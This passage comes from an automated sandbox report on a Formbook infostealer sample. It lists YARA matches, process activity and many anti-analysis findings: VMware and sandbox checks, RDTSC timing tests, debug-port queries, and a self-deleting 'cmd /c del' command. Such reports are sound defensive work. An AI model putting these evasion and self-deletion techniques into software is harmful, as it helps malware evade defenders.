            Source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.YvGnm93rap.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.2.YvGnm93rap.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.YvGnm93rap.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.2.YvGnm93rap.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: YvGnm93rap.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: YvGnm93rap.exe, ParentalControl/ParentalControl.csSecurity API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
            Source: YvGnm93rap.exe, ParentalControl/ParentalControl.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: YvGnm93rap.exe, ParentalControl/ParentalControl.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 0.2.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
            Source: 0.2.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 2.2.YvGnm93rap.exe.460000.1.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
            Source: 2.2.YvGnm93rap.exe.460000.1.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 2.2.YvGnm93rap.exe.460000.1.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 0.0.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
            Source: 0.0.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.0.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 2.0.YvGnm93rap.exe.460000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
            Source: 2.0.YvGnm93rap.exe.460000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 2.0.YvGnm93rap.exe.460000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@19/7
            Source: C:\Users\user\Desktop\YvGnm93rap.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YvGnm93rap.exe.logJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6572:120:WilError_01
            Source: YvGnm93rap.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\YvGnm93rap.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\YvGnm93rap.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: YvGnm93rap.exeVirustotal: Detection: 46%
            Source: YvGnm93rap.exeReversingLabs: Detection: 26%
            Source: unknownProcess created: C:\Users\user\Desktop\YvGnm93rap.exe 'C:\Users\user\Desktop\YvGnm93rap.exe'
            Source: unknownProcess created: C:\Users\user\Desktop\YvGnm93rap.exe {path}
            Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\YvGnm93rap.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess created: C:\Users\user\Desktop\YvGnm93rap.exe {path}
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\YvGnm93rap.exe'
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
            Source: C:\Users\user\Desktop\YvGnm93rap.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: YvGnm93rap.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: YvGnm93rap.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: YvGnm93rap.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: msiexec.pdb source: YvGnm93rap.exe, 00000002.00000002.267148139.0000000001250000.00000040.00000001.sdmp
            Source: Binary string: msiexec.pdbGCTL source: YvGnm93rap.exe, 00000002.00000002.267148139.0000000001250000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: YvGnm93rap.exe, 00000002.00000003.226603868.0000000000BA0000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdb source: YvGnm93rap.exe

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: YvGnm93rap.exe, ParentalControl/ParentalControl.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.0.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.2.YvGnm93rap.exe.b30000.0.unpack, ParentalControl/ParentalControl.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 2.0.YvGnm93rap.exe.460000.0.unpack, ParentalControl/ParentalControl.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 2.2.YvGnm93rap.exe.460000.1.unpack, ParentalControl/ParentalControl.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Binary contains a suspicious time stampShow sources
            Source: initial sampleStatic PE information: 0x87A8763C [Fri Feb 14 04:21:16 2042 UTC]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041C952 push 06E61A6Ah; ret
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041C932 push 06E61A6Ah; ret
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041B3B5 push eax; ret
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041B46C push eax; ret
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041B402 push eax; ret
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041B40B push eax; ret
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F4D0D1 push ecx; ret
            Source: initial sampleStatic PE information: section name: .text entropy: 7.87823365772
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM_3Show sources
            Source: Yara matchFile source: 00000000.00000002.227447533.00000000030B1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: YvGnm93rap.exe PID: 2396, type: MEMORY
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\YvGnm93rap.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\YvGnm93rap.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 0000000002E485E4 second address: 0000000002E485EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 0000000002E4897E second address: 0000000002E48984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_004088B0 rdtsc
            Source: C:\Users\user\Desktop\YvGnm93rap.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\YvGnm93rap.exe TID: 1004Thread sleep time: -31500s >= -30000s
            Source: C:\Users\user\Desktop\YvGnm93rap.exe TID: 2616Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 4604Thread sleep time: -100000s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6932Thread sleep count: 38 > 30
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6932Thread sleep time: -76000s >= -30000s
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmpBinary or memory string: VMware
            Source: explorer.exe, 00000003.00000000.245297462.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000003.00000000.245297462.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
            Source: explorer.exe, 00000003.00000000.239789779.0000000004DF3000.00000004.00000001.sdmpBinary or memory string: #{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&L
            Source: explorer.exe, 00000003.00000000.244872994.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: explorer.exe, 00000003.00000000.245156332.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmpBinary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000003.00000000.240164900.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmpBinary or memory string: VMWARE
            Source: explorer.exe, 00000003.00000000.245297462.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
            Source: explorer.exe, 00000003.00000000.245297462.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
            Source: explorer.exe, 00000003.00000000.245453797.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
            Source: explorer.exe, 00000003.00000003.562890431.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000003.00000000.244872994.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 00000003.00000000.244872994.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmpBinary or memory string: VMware
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmpBinary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 00000003.00000000.244872994.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_004088B0 rdtsc
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00409B20 LdrLoadDll,
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF58EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF40E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF40E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF40E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F8B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F8B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F8B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F8B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F8B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F8B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F220A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F220A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F220A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F220A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F220A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F220A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F390AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF9080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F73884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F73884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB2073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC1074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F10050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F10050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F0B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F0B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F0B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F0B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F77016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F77016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F77016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EFB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EFB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EFB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F841E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F751BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F751BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F751BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F751BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F199BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F199BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F199BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F199BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F199BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F199BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F199BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F199BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F199BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F199BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F199BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F199BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F769A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F261A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F261A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB49A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB49A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB49A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB49A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F22990 mov eax, dword ptr fs:[00000030h]
